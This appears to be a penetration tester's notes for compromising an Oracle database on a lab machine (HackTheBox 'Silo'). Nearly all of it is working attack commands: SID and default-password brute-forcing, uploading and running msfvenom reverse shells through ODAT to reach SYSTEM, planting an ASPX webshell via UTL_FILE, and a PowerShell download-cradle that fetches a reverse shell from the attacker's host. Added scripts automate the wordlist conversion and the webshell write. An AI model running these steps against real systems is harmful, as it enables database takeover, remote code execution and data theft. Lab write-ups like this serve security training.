Oracle
Scan
80 http IIS httpd 8.5
1521 oracle-tns 11.2.0.2.0 (unauthorized)
49160 oracletns listener (requires service name)
nmap
Found the SID
nmap -Pn -n -sV -p1521 --script='oracle*' 10.x.x.x -e tun0 ..quote the glob so the shell does not expand it
PORT STATE SERVICE VERSION
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
|
| oracle-sid-brute:
|_ XE
hydra
Can find the SID too
hydra -L sids-oracle.txt -s 1521 10.10.10.82 oracle-sid
Oracle Client and ODAT Setup
git clone https://github.com/quentinhardy/odat
cd odat
git submodule init
git submodule update
sudo apt-get install libaio1 python-dev alien python-pip
oracle-instantclient-basic-base .. download 64-bit rpm
oracle-instantclient-basic-sqlplus .. download 64-bit rpm
oracle-instantclient-devel .. download 64-bit rpm
sudo alien --to-deb *.rpm .. convert to deb (if you need)
dpkg -i *.deb .. install
vim /etc/profile .. bunch of edits (ref: ODAT)
export ORACLE_HOME ...
export LD_LIBRARY_PATH ...
export PATH=...
sql ..<tab> .. reopen terminal and try
sqlplus64 ..works!
pip2 install cx_Oracle .. may also need this
Oracle SID
Find the SID with odat or metasploit
--------------------------
--------------------------
odat.py -h
odat.py sidguesser -h
odat.py sidguesser -s 10.x.x.x -p 1521
python3 odat.py sidguesser -s 10.x.x.x -p 1521 --sids-file /usr/share/odat/sids.txt
found 'XE', 'XEXDB'
--------------------------
--------------------------
msfconsole
search oracle
use auxiliary/scanner/oracle/sid_brute
set RHOSTS 10.x.x.x
run
found 'XE', 'XEXDB'
search scanner/oracle
use auxiliary/scanner/oracle/oracle_login
set RHOSTS 10.x.x.x
set SID XE ..default
set RPORT 1521 ..option is RPORT (singular); the original note had 'RPORTS 1512', a typo
run ..error 'closed'
Oracle Pass
Need the SID for this to work
odat defaults:
Port: 1521
odat/accounts/accounts.txt
Oracle Default Creds:
--------------------------
--------------------------
odat.py passwordguesser -h
odat.py passwordguesser -s 10.x.x.x -d XE
odat.py passwordguesser -s 10.x.x.x -d XE -p 1521 --accounts-file myusers.txt
Normal:
cat odat/accounts/accounts.txt ..format is user/pass, one per line; problem: all UPPERCASE (11g passwords are case-sensitive by default, so SCOTT/TIGER does not match scott/tiger)
--------------------------
--------------------------
Metasploit has a better file:
locate oracle_default_userpass ..mixture upper/lower, format is 'user pass'
cp oracle_default_userpass.txt accounts.txt ..overwrite
vim accounts.txt ..different separator
:%s/ /\//g ..vim substitute (not sed) to replace 'space' with '/'
--------------------------
--------------------------
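The same conversion as a reusable shell function, added here as an example (not from the original notes or from ODAT/Metasploit). It reads Metasploit's "user pass" format on stdin, writes ODAT's "user/pass" format on stdout, and also emits a lowercase-password variant of each pair because 11g+ passwords are case-sensitive. The sample list below is constructed for the demo and is not the real oracle_default_userpass.txt.

```shell
# Convert a Metasploit "user pass" wordlist (stdin) into ODAT's "user/pass"
# format (stdout). For every pair we also emit a lowercase-password variant,
# because Oracle 11g+ compares passwords case-sensitively by default while
# usernames are case-insensitive unless quoted. Comment and blank lines are
# skipped; duplicates are dropped, keeping first-seen order.
msf_to_odat() {
    awk '
        function emit(l) { if (!seen[l]++) print l }
        /^[ \t]*(#|$)/ { next }
        NF >= 2 {
            emit($1 "/" $2)
            emit($1 "/" tolower($2))
        }
    '
}

# Constructed sample in Metasploit's format (not the real oracle_default_userpass.txt)
SAMPLE_MSF='# user pass
SYS CHANGE_ON_INSTALL
SYSTEM MANAGER

scott tiger
DBSNMP DBSNMP'

# Usage against the real list (path assumed, adjust to your locate output):
#   msf_to_odat < "$(locate oracle_default_userpass.txt | head -n1)" > accounts.txt
#   odat.py passwordguesser -s 10.x.x.x -d XE --accounts-file accounts.txt
printf '%s\n' "$SAMPLE_MSF" | msf_to_odat
```

Pipe the converted file into `--accounts-file`; the lowercase variants roughly double the list, which is still small enough that ODAT's per-user lockout handling is not an issue for the default accounts.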
user: scott ..Found!
pass: tiger
Login with sqlplus
sqlplus64 scott/tiger@10.10.10.82:1521/XE
sqlplus64 scott/tiger@10.10.10.82:1521/XE as sysdba
select * from session_privs;
select * from user_role_privs;
exit
ODAT Upload and Execute
Requires: SID, User, Pass, Venom
--------------------------
utlfile (upload)
msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.31 LPORT=4444 -o shell.exe
python3 odat.py utlfile -s 10.x.x.x -p 1521 -U "scott" -P "tiger" -d XE -n -t --sysdba --putFile /temp shell.exe /htb/Silo/shell.exe ..args: remote dir, remote name, local file (forward slash; a bare \temp is eaten by the shell)
--------------------------
externaltable (execute)
python3 odat.py externaltable -s 10.x.x.x -p 1521 -U "scott" -P "tiger" -d XE -n -t --sysdba --exec /temp shell.exe
nc -nvlp 4444
system!
ODAT (with MSF)
Quick Method:
Straight to 'system' with ODAT
--------------------------
odat.py -h
odat.py utlfile -h ..upload/download/delete
odat.py externaltable -h ..read/execute files/scripts
--------------------------
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=9002 -f exe -o venom.exe
odat.py utlfile -s $IP -d XE \
    -U scott -P tiger \
    --sysdba \
    --putFile /temp venom.exe ../venom.exe
--------------------------
msfconsole ..setup listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 9002
run
--------------------------
odat.py externaltable -s $IP -d XE \
    -U scott -P tiger \
    --sysdba \
    --exec /temp venom.exe
--------------------------
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Read a File - with sqlplus
You will need SID, User, Pass, sysdba privs. UTL_FILE only opens OS paths that UTL_FILE_DIR allows (here it evidently allowed everything, i.e. '*'); if you get ORA-29280 invalid directory path, create a DIRECTORY object instead and pass its name as the first fopen argument. Paths are relative to the drive Oracle runs from, so '/inetpub/wwwroot' is C:\inetpub\wwwroot.
Login:
sqlplus64 scott/tiger@10.10.10.82:1521/XE as sysdba
SQL> set serveroutput on ..do this BEFORE running the block, or the dbms_output lines are discarded
SQL>
declare
  f utl_file.file_type;
  s varchar2(32767);
begin
  f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R', 32767);
  -- f := utl_file.fopen('/root', 'root.txt', 'R', 32767);  -- alternative target
  loop                                  -- read every line, not just the first
    utl_file.get_line(f, s);
    dbms_output.put_line(s);
  end loop;
exception
  when no_data_found then               -- raised at end of file
    utl_file.fclose(f);
end;
/ ..to run the block (the original read one line into a varchar(200), hence "200 chars")
flag!!
Make a File - with sqlplus
SQL>
declare
f utl_file.file_type;
s varchar(5000) := 'Hello Friends';
begin
f := utl_file.fopen('/inetpub/wwwroot', 'helloworld.txt', 'W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
/ ..Successfully Completed
http://10.x.x.x/helloworld.txt ..Worked!
Hello Friends
Make a Webshell - with sqlplus
--------------------------
--------------------------
locate aspx$
mkdir shells
cd shells
cp cmdasp.aspx .
wc -c cmdasp.aspx ..1400; the original note said oracle doesnt like > 1024 chars: that limit is UTL_FILE.FOPEN's default max_linesize (1024), so a long put_line fails with ORA-29285. Passing 32767 as the fourth fopen argument removes it; the minification below is what was done at the time and still works
vi cmdasp.aspx ..clean it up
sed -z 's/\n//g' cmdasp.aspx ..remove newline chars (prints to stdout; add -i or redirect to a new file to keep the result)
wc -c cmdasp.aspx ..1358
vi cmdasp.aspx ..clean it up
<head> ..remove
style="Z..." ..remove
<!--comments--> ..remove
sed -z 's/\n//g' cmdasp.aspx | wc -c ..991 good (under 1024)
copy your one-liner
paste to
--------------------------
--------------------------
SQL>
declare
  f utl_file.file_type;
  s varchar2(5000) := 'Paste your oneline cmdasp.aspx here';  -- double any single quotes in the payload
begin
  f := utl_file.fopen('/inetpub/wwwroot', 'evilcmd.aspx', 'W', 32767);  -- max_linesize 32767, so lines > 1024 bytes are fine
  utl_file.put_line(f, s);
  utl_file.fclose(f);
end;
/ .. Success (run 'set define off' first if the payload contains '&', or SQL*Plus prompts for a substitution variable)
http://10.x.x.x/evilcmd.aspx .. Worked!
whoami .. execute!
whoami /all .. see everyone
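A generator for the write step, added here as an example (not from the original notes): instead of hand-minifying the webshell to under 1024 bytes, it emits a SQL*Plus script that recreates any local file on the database host through UTL_FILE. It assumes the same fopen-with-OS-path access the notes relied on (UTL_FILE_DIR permitting the target directory); the remote path, file name and demo input are constructed for the example.

```shell
# gen_utl_file_write <remote_dir> <remote_file> <local_file>
#   Print a SQL*Plus script that recreates <local_file> on the database host
#   with UTL_FILE. Compared with the single put_line above:
#     - fopen gets max_linesize = 32767 (the default 1024 is what rejects
#       long lines with ORA-29285), so no minification is needed
#     - each source line is written in <= 1000-char pieces with utl_file.put,
#       so no script line exceeds SQL*Plus's 2499-char input limit, and
#       single quotes are doubled after chunking so a pair is never split
#     - 'set define off' stops SQL*Plus from treating '&' in the payload
#       as a substitution variable
gen_utl_file_write() {
    rdir=$1; rfile=$2; src=$3
    printf 'set define off\n'
    printf 'declare\n  f utl_file.file_type;\nbegin\n'
    printf "  f := utl_file.fopen('%s', '%s', 'W', 32767);\n" "$rdir" "$rfile"
    awk -v q="'" -v w=1000 '
        {
            line = $0
            while (length(line) > 0) {
                chunk = substr(line, 1, w)
                line  = substr(line, w + 1)
                gsub(q, q q, chunk)          # escape quotes inside the SQL literal
                printf "  utl_file.put(f, %s%s%s);\n", q, chunk, q
            }
            print "  utl_file.new_line(f);"  # one new_line per source line
        }' "$src"
    printf '  utl_file.fclose(f);\nend;\n/\n'
}

# Constructed demo input (a stand-in for cmdasp.aspx; contains a quote on purpose)
sample=$(mktemp)
printf '%s\n' '<%@ Page Language="C#" %>' "<% Response.Write(\"it's alive\"); %>" > "$sample"

# Usage against the target from the notes (host, creds and SID as in the page):
#   gen_utl_file_write /inetpub/wwwroot evilcmd.aspx cmdasp.aspx \
#     | sqlplus64 -S 'scott/tiger@10.10.10.82:1521/XE as sysdba'
gen_utl_file_write /inetpub/wwwroot evilcmd.aspx "$sample"
rm -f "$sample"
```

The generated script never contains a blank line or a line consisting of a lone '.', both of which would end PL/SQL block input in SQL*Plus before the closing '/'.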
Webshell: Reverse PowerShell
--------------------
locate nishang shell
cp Invoke-PowerShellTcp.ps1 .
mkdir www
mv Invoke-PowerShellTcp.ps1 www/rev.ps1
vim rev.ps1
Add as last-line of script:
Invoke-PowerShellTcp -Reverse -IPAddress 10.x.x.x -Port 4444
python -m SimpleHTTPServer ..to share rev.ps1
--------------------
http://10.x.x.x/evilcmd.aspx
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.x.x.x/rev.ps1')"
--------------------
nc -nvlp 4444 .. listen
PS C:\windows> .. Reverse shell!
PS cd C:\Users\Phineas\Desktop
PS dir
PS> Get-Content "Oracle Issue.txt" .. to read a file in Powershell
Enumerate the listener version
Interesting. Didn't use this though.
tnscmd10g version -p 1521 -h 10.x.x.x
tnscmd10g status -h 10.x.x.x
tnscmd10g status -h 10.x.x.x --10G